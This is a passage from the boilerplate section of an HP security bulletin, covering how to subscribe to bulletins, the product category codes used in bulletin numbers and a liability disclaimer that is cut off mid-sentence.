  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA; langcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC

On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
  - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary
  - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

  GN = HP General SW
  MA = HP Management Agents
  MI = Misc. 3rd party SW
  MP = HP MPE/iX
  NS = HP NonStop Servers
  OV = HP OpenVMS
  PI = HP Printing Imaging
  ST = HP Storage SW
  TL = HP Trusted Linux
  TU = HP Tru64 UNIX
  UX = HP-UX
  VV = HP Virtual Vault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for